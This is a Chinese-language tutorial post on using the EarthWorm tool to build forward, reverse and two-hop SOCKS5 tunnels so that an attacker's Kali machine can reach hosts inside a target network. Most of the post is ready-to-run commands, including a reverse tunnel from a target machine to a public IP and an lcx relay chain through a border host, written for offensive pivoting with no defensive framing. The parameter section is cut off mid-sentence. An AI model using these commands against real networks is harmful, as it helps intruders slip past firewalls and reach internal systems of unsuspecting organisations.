使用 EW 作Socks5代理

一曲冷凌霜 提交于 2019-12-03 21:27:08
简介:
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 主页: http://rootkiter.com/EarthWorm/
 
ew项目地址:
 
【使用场景】 普通网络环境: 1. 目标网络边界存在公网IP且可任意开监听端口: a)./ew -s ssocksd -l 8888 开启 8888 端口的 socks 代理 b) 攻击机通过访问 目标主机8888 端口使用目标主机提供的代理 2. 目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理 a) ./ew -s rcsocks -l 1080 -e 8888 // 在公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机 b) ./ew -s rssocks -d 1.1.1.1 -e 8888 // 将目标网络的可控边界主机反向连接公网主机8888端口 c) 攻击机可通过访问公网主机1080 端口使用 rssocks 主机提供的 socks5 代理服务
使用EW做反向Socks5代理
1.在公网服务器上执行以下命令:
./ew_for_linux64 -s rcsocks -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

2.在目标机器执行以下命令
.\ew_for_Win.exe -s rssocks -d 97.64.80.23 -e 1024 通过socks隧道连接公网IP的1024端口

3.攻击机kali通过proxychins或者浏览器配置socks5代理访问目标内网机器
第一种:使用socks代理访问目标内网

使用Python开启web服务

在kali上访问目标内网IP即可访问web服务

 
使用proxychins访问目标内网
编辑proxychins配置文件
vim /etc/proxychains.conf

然后访问使用proxychains代理访问 127.0.0.1, 就成功了:

 
二重网络环境
攻击机:内网主机 kali A
攻击机:公网主机 debian B
目标主机A:目标网络的边界主机,无公网 IP,无法访问特定资源。
目标主机B:目标网络内部主机,可访问特定资源,却无法回连公网。
A 主机可直连 B 主机
 
1.公网主机B添加转接隧道
./ew_for_linux64 -s lcx_listen -l 1080 -e 1024 监听本机的1080端口转发到反连1024端口的主机

2.在内网主机B上利用 ssocksd 方式启动 9999 端口的 socks 代理
.\ew_for_Win.exe -s ssocksd -l 9999

3.在内网主机A上通过工具的lcx_slave方式,打通公网主机1024端口和主机B 9999之间的通讯隧道
.\ew_for_Win.exe -s lcx_slave -d 97.64.80.23 -e 1024 -f 192.168.245.131 -g 9999

4.内网攻击主机kali 通过访问 公网主机1080端口来使用 内网主机B提供的 socks5 代理

 

 
【参数说明】 目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为: ssocksd rcsocks rssocks lcx_slave lcx_tran lcx_listen SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。 其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。 lcx 类别管道: lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。 lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。 lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!